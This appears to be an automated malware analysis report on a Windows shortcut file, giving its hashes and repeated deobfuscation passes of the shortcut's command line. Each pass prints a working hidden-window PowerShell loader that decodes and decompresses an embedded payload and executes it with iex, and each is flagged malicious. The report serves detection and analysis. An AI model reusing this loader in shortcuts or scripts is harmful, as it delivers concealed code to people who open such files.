|
Hash | Hash Value |
|---|---|
| MD5 | 340a28c94906fb2c40fd066ea1660669
|
| Sha1 | 6d00fd48542dbc40ffa0aeba2df5e0f8358dbaec
|
| Sha256 | 0e032aa835a6e356c9a628bf52179b8bc551cca431b1d464d6f600bb8d6c0cad
|
| Sha384 | cd375c4562f23ff6e2fdd3a1e524c15a133c2b4957ea9110e0ac5a1a12c0cb12509121bbf6d37fe9d6dd707df2666c3a
|
| Sha512 | 676a2bcc2aa41537a3dd5a0b831ffcf613c1f6a56208a1caa7bad7681c54b61dfa7e1ea5e83d8ced8e5dc0c4bc62e1d1a6ecb849dc6a74bb59650b0252d44145
|
| SSDeep | 24:9BnBUY8E4ZRZspy78uui2Ln81woT7Dyb0+KEqe7ENr/InBHABUgegUHY1a:9xO3EEsp2Yi2L8iTr7kr+BgOgegUH5
|
| TLSH | E8210B715338150BD53742FD6B615D805D1F1015A5F00CF960B55C810B99767157393C
|
|
Name0 | Value |
|---|---|
| LNK: Command Execution | cmd.exe /c powershell -w hidden -c "$zlfai='FYw9C8IwFAD/SikBdWgLDg4NIrV+UKhaRHHJEpKnTUmT2PfUxR9v3e7gODYs90DJWTrte87CMmbg3nl9Kou6aJpNcSnEwajBo7+TuJkx+6CojkClVC2IaivYkLYkYz6tbudo0hIFzLPs2b206kClgMpbqcFo43uJqXfWOMhWi0mUXBHWEo1q5IDGPWZp6R2Bo+/pRcnOWIhY4D2O+z+gBQjRnGuwo/4A';$czayo=New-Object IO.MemoryStream(,[Convert]::FromBase64String($zlfai));$smwqigj=New-Object IO.Compression.DeflateStream($czayo,[IO.Compression.CompressionMode]::Decompress);$zhafqtd=New-Object IO.StreamReader($smwqigj);iex $zhafqtd.ReadToEnd()" |
| Deobfuscated PowerShell | powershell -w "hidden" -c "$zlfai='FYw9C8IwFAD/SikBdWgLDg4NIrV+UKhaRHHJEpKnTUmT2PfUxR9v3e7gODYs90DJWTrte87CMmbg3nl9Kou6aJpNcSnEwajBo7+TuJkx+6CojkClVC2IaivYkLYkYz6tbudo0hIFzLPs2b206kClgMpbqcFo43uJqXfWOMhWi0mUXBHWEo1q5IDGPWZp6R2Bo+/pRcnOWIhY4D2O+z+gBQjRnGuwo/4A';$czayo=New-Object IO.MemoryStream(,[Convert]::FromBase64String($zlfai));$smwqigj=New-Object IO.Compression.DeflateStream($czayo,[IO.Compression.CompressionMode]::Decompress);$zhafqtd=New-Object IO.StreamReader($smwqigj);iex $zhafqtd.ReadToEnd()" |
| Deobfuscated PowerShell | $zlfai = "FYw9C8IwFAD/SikBdWgLDg4NIrV+UKhaRHHJEpKnTUmT2PfUxR9v3e7gODYs90DJWTrte87CMmbg3nl9Kou6aJpNcSnEwajBo7+TuJkx+6CojkClVC2IaivYkLYkYz6tbudo0hIFzLPs2b206kClgMpbqcFo43uJqXfWOMhWi0mUXBHWEo1q5IDGPWZp6R2Bo+/pRcnOWIhY4D2O+z+gBQjRnGuwo/4A" $czayo = New-Object "IO.MemoryStream" (@([Convert]::"FromBase64String"($zlfai))) $smwqigj = New-Object "IO.Compression.DeflateStream" (@($czayo, [CompressionMode]::"Decompress")) $zhafqtd = New-Object "IO.StreamReader" ($smwqigj) Invoke-Expression $zhafqtd."ReadToEnd"() |
| Deobfuscated PowerShell | powershell -w "hidden" -c "$zlfai='FYw9C8IwFAD/SikBdWgLDg4NIrV+UKhaRHHJEpKnTUmT2PfUxR9v3e7gODYs90DJWTrte87CMmbg3nl9Kou6aJpNcSnEwajBo7+TuJkx+6CojkClVC2IaivYkLYkYz6tbudo0hIFzLPs2b206kClgMpbqcFo43uJqXfWOMhWi0mUXBHWEo1q5IDGPWZp6R2Bo+/pRcnOWIhY4D2O+z+gBQjRnGuwo/4A';$czayo=New-Object IO.MemoryStream(,[Convert]::FromBase64String($zlfai));$smwqigj=New-Object IO.Compression.DeflateStream($czayo,[IO.Compression.CompressionMode]::Decompress);$zhafqtd=New-Object IO.StreamReader($smwqigj);iex $zhafqtd.ReadToEnd()" |
| Deobfuscated PowerShell | $zlfai = "FYw9C8IwFAD/SikBdWgLDg4NIrV+UKhaRHHJEpKnTUmT2PfUxR9v3e7gODYs90DJWTrte87CMmbg3nl9Kou6aJpNcSnEwajBo7+TuJkx+6CojkClVC2IaivYkLYkYz6tbudo0hIFzLPs2b206kClgMpbqcFo43uJqXfWOMhWi0mUXBHWEo1q5IDGPWZp6R2Bo+/pRcnOWIhY4D2O+z+gBQjRnGuwo/4A" $czayo = New-Object "IO.MemoryStream" (@({ [Convert]::"FromBase64String"($zlfai) } )) $smwqigj = New-Object "IO.Compression.DeflateStream" (@({ @($czayo, [CompressionMode]::"Decompress") } )) $zhafqtd = New-Object "IO.StreamReader" ($smwqigj) Invoke-Expression $zhafqtd."ReadToEnd"() |
| Deobfuscated PowerShell | $zlfai = "FYw9C8IwFAD/SikBdWgLDg4NIrV+UKhaRHHJEpKnTUmT2PfUxR9v3e7gODYs90DJWTrte87CMmbg3nl9Kou6aJpNcSnEwajBo7+TuJkx+6CojkClVC2IaivYkLYkYz6tbudo0hIFzLPs2b206kClgMpbqcFo43uJqXfWOMhWi0mUXBHWEo1q5IDGPWZp6R2Bo+/pRcnOWIhY4D2O+z+gBQjRnGuwo/4A" $czayo = New-Object "IO.MemoryStream" [Convert]::"FromBase64String"($zlfai) $smwqigj = New-Object "IO.Compression.DeflateStream" @({ @($czayo, [CompressionMode]::"Decompress") } ) $zhafqtd = New-Object "IO.StreamReader" ($smwqigj) Invoke-Expression $zhafqtd."ReadToEnd"() |
| Deobfuscated PowerShell | $zlfai = "FYw9C8IwFAD/SikBdWgLDg4NIrV+UKhaRHHJEpKnTUmT2PfUxR9v3e7gODYs90DJWTrte87CMmbg3nl9Kou6aJpNcSnEwajBo7+TuJkx+6CojkClVC2IaivYkLYkYz6tbudo0hIFzLPs2b206kClgMpbqcFo43uJqXfWOMhWi0mUXBHWEo1q5IDGPWZp6R2Bo+/pRcnOWIhY4D2O+z+gBQjRnGuwo/4A" $czayo = New-Object "IO.MemoryStream" "[Convert]::FromBase64String" ($zlfai) $smwqigj = New-Object "IO.Compression.DeflateStream" @({ @($czayo, [CompressionMode]::"Decompress") } ) $zhafqtd = New-Object "IO.StreamReader" ($smwqigj) Invoke-Expression $zhafqtd."ReadToEnd"() |
| Deobfuscated PowerShell | $zlfai = "FYw9C8IwFAD/SikBdWgLDg4NIrV+UKhaRHHJEpKnTUmT2PfUxR9v3e7gODYs90DJWTrte87CMmbg3nl9Kou6aJpNcSnEwajBo7+TuJkx+6CojkClVC2IaivYkLYkYz6tbudo0hIFzLPs2b206kClgMpbqcFo43uJqXfWOMhWi0mUXBHWEo1q5IDGPWZp6R2Bo+/pRcnOWIhY4D2O+z+gBQjRnGuwo/4A" $czayo = New-Object "IO.MemoryStream" "[Convert]::FromBase64String" ($zlfai) $smwqigj = New-Object "IO.Compression.DeflateStream" @({ @($czayo, [CompressionMode]::"Decompress") } ) $zhafqtd = New-Object "IO.StreamReader" ($smwqigj) Invoke-Expression $zhafqtd."ReadToEnd"() |
|
Name0 | Value | Location |
|---|---|---|
| LNK: Command Execution | cmd.exe /c powershell -w hidden -c "$zlfai='FYw9C8IwFAD/SikBdWgLDg4NIrV+UKhaRHHJEpKnTUmT2PfUxR9v3e7gODYs90DJWTrte87CMmbg3nl9Kou6aJpNcSnEwajBo7+TuJkx+6CojkClVC2IaivYkLYkYz6tbudo0hIFzLPs2b206kClgMpbqcFo43uJqXfWOMhWi0mUXBHWEo1q5IDGPWZp6R2Bo+/pRcnOWIhY4D2O+z+gBQjRnGuwo/4A';$czayo=New-Object IO.MemoryStream(,[Convert]::FromBase64String($zlfai));$smwqigj=New-Object IO.Compression.DeflateStream($czayo,[IO.Compression.CompressionMode]::Decompress);$zhafqtd=New-Object IO.StreamReader($smwqigj);iex $zhafqtd.ReadToEnd()" Malicious |
340a28c94906fb2c40fd066ea1660669 > 30fdcd36-6cd2-7972.lnk |
| Deobfuscated PowerShell | powershell -w "hidden" -c "$zlfai='FYw9C8IwFAD/SikBdWgLDg4NIrV+UKhaRHHJEpKnTUmT2PfUxR9v3e7gODYs90DJWTrte87CMmbg3nl9Kou6aJpNcSnEwajBo7+TuJkx+6CojkClVC2IaivYkLYkYz6tbudo0hIFzLPs2b206kClgMpbqcFo43uJqXfWOMhWi0mUXBHWEo1q5IDGPWZp6R2Bo+/pRcnOWIhY4D2O+z+gBQjRnGuwo/4A';$czayo=New-Object IO.MemoryStream(,[Convert]::FromBase64String($zlfai));$smwqigj=New-Object IO.Compression.DeflateStream($czayo,[IO.Compression.CompressionMode]::Decompress);$zhafqtd=New-Object IO.StreamReader($smwqigj);iex $zhafqtd.ReadToEnd()" Malicious |
340a28c94906fb2c40fd066ea1660669 > 30fdcd36-6cd2-7972.lnk > LNK CommandLine |
| Deobfuscated PowerShell | $zlfai = "FYw9C8IwFAD/SikBdWgLDg4NIrV+UKhaRHHJEpKnTUmT2PfUxR9v3e7gODYs90DJWTrte87CMmbg3nl9Kou6aJpNcSnEwajBo7+TuJkx+6CojkClVC2IaivYkLYkYz6tbudo0hIFzLPs2b206kClgMpbqcFo43uJqXfWOMhWi0mUXBHWEo1q5IDGPWZp6R2Bo+/pRcnOWIhY4D2O+z+gBQjRnGuwo/4A" $czayo = New-Object "IO.MemoryStream" (@([Convert]::"FromBase64String"($zlfai))) $smwqigj = New-Object "IO.Compression.DeflateStream" (@($czayo, [CompressionMode]::"Decompress")) $zhafqtd = New-Object "IO.StreamReader" ($smwqigj) Invoke-Expression $zhafqtd."ReadToEnd"() Malicious |
340a28c94906fb2c40fd066ea1660669 > 30fdcd36-6cd2-7972.lnk > LNK CommandLine > [PowerShell Command] |
| Deobfuscated PowerShell | powershell -w "hidden" -c "$zlfai='FYw9C8IwFAD/SikBdWgLDg4NIrV+UKhaRHHJEpKnTUmT2PfUxR9v3e7gODYs90DJWTrte87CMmbg3nl9Kou6aJpNcSnEwajBo7+TuJkx+6CojkClVC2IaivYkLYkYz6tbudo0hIFzLPs2b206kClgMpbqcFo43uJqXfWOMhWi0mUXBHWEo1q5IDGPWZp6R2Bo+/pRcnOWIhY4D2O+z+gBQjRnGuwo/4A';$czayo=New-Object IO.MemoryStream(,[Convert]::FromBase64String($zlfai));$smwqigj=New-Object IO.Compression.DeflateStream($czayo,[IO.Compression.CompressionMode]::Decompress);$zhafqtd=New-Object IO.StreamReader($smwqigj);iex $zhafqtd.ReadToEnd()" Malicious |
340a28c94906fb2c40fd066ea1660669 > 30fdcd36-6cd2-7972.lnk > LNK CommandLine > [Deobfuscated PS] |
| Deobfuscated PowerShell | $zlfai = "FYw9C8IwFAD/SikBdWgLDg4NIrV+UKhaRHHJEpKnTUmT2PfUxR9v3e7gODYs90DJWTrte87CMmbg3nl9Kou6aJpNcSnEwajBo7+TuJkx+6CojkClVC2IaivYkLYkYz6tbudo0hIFzLPs2b206kClgMpbqcFo43uJqXfWOMhWi0mUXBHWEo1q5IDGPWZp6R2Bo+/pRcnOWIhY4D2O+z+gBQjRnGuwo/4A" $czayo = New-Object "IO.MemoryStream" (@({ [Convert]::"FromBase64String"($zlfai) } )) $smwqigj = New-Object "IO.Compression.DeflateStream" (@({ @($czayo, [CompressionMode]::"Decompress") } )) $zhafqtd = New-Object "IO.StreamReader" ($smwqigj) Invoke-Expression $zhafqtd."ReadToEnd"() Malicious |
340a28c94906fb2c40fd066ea1660669 > 30fdcd36-6cd2-7972.lnk > LNK CommandLine > [PowerShell Command] > [Deobfuscated PS] |
| Deobfuscated PowerShell | $zlfai = "FYw9C8IwFAD/SikBdWgLDg4NIrV+UKhaRHHJEpKnTUmT2PfUxR9v3e7gODYs90DJWTrte87CMmbg3nl9Kou6aJpNcSnEwajBo7+TuJkx+6CojkClVC2IaivYkLYkYz6tbudo0hIFzLPs2b206kClgMpbqcFo43uJqXfWOMhWi0mUXBHWEo1q5IDGPWZp6R2Bo+/pRcnOWIhY4D2O+z+gBQjRnGuwo/4A" $czayo = New-Object "IO.MemoryStream" [Convert]::"FromBase64String"($zlfai) $smwqigj = New-Object "IO.Compression.DeflateStream" @({ @($czayo, [CompressionMode]::"Decompress") } ) $zhafqtd = New-Object "IO.StreamReader" ($smwqigj) Invoke-Expression $zhafqtd."ReadToEnd"() Malicious |
340a28c94906fb2c40fd066ea1660669 > 30fdcd36-6cd2-7972.lnk > LNK CommandLine > [PowerShell Command] > [Deobfuscated PS] > [Deobfuscated PS] |
| Deobfuscated PowerShell | $zlfai = "FYw9C8IwFAD/SikBdWgLDg4NIrV+UKhaRHHJEpKnTUmT2PfUxR9v3e7gODYs90DJWTrte87CMmbg3nl9Kou6aJpNcSnEwajBo7+TuJkx+6CojkClVC2IaivYkLYkYz6tbudo0hIFzLPs2b206kClgMpbqcFo43uJqXfWOMhWi0mUXBHWEo1q5IDGPWZp6R2Bo+/pRcnOWIhY4D2O+z+gBQjRnGuwo/4A" $czayo = New-Object "IO.MemoryStream" "[Convert]::FromBase64String" ($zlfai) $smwqigj = New-Object "IO.Compression.DeflateStream" @({ @($czayo, [CompressionMode]::"Decompress") } ) $zhafqtd = New-Object "IO.StreamReader" ($smwqigj) Invoke-Expression $zhafqtd."ReadToEnd"() Malicious |
340a28c94906fb2c40fd066ea1660669 > 30fdcd36-6cd2-7972.lnk > LNK CommandLine > [PowerShell Command] > [Deobfuscated PS] > [Deobfuscated PS] > [Deobfuscated PS] |
| Deobfuscated PowerShell | $zlfai = "FYw9C8IwFAD/SikBdWgLDg4NIrV+UKhaRHHJEpKnTUmT2PfUxR9v3e7gODYs90DJWTrte87CMmbg3nl9Kou6aJpNcSnEwajBo7+TuJkx+6CojkClVC2IaivYkLYkYz6tbudo0hIFzLPs2b206kClgMpbqcFo43uJqXfWOMhWi0mUXBHWEo1q5IDGPWZp6R2Bo+/pRcnOWIhY4D2O+z+gBQjRnGuwo/4A" $czayo = New-Object "IO.MemoryStream" "[Convert]::FromBase64String" ($zlfai) $smwqigj = New-Object "IO.Compression.DeflateStream" @({ @($czayo, [CompressionMode]::"Decompress") } ) $zhafqtd = New-Object "IO.StreamReader" ($smwqigj) Invoke-Expression $zhafqtd."ReadToEnd"() Malicious |
340a28c94906fb2c40fd066ea1660669 > 30fdcd36-6cd2-7972.lnk > LNK CommandLine > [PowerShell Command] > [Deobfuscated PS] > [Deobfuscated PS] > [Deobfuscated PS] > [Deobfuscated PS] |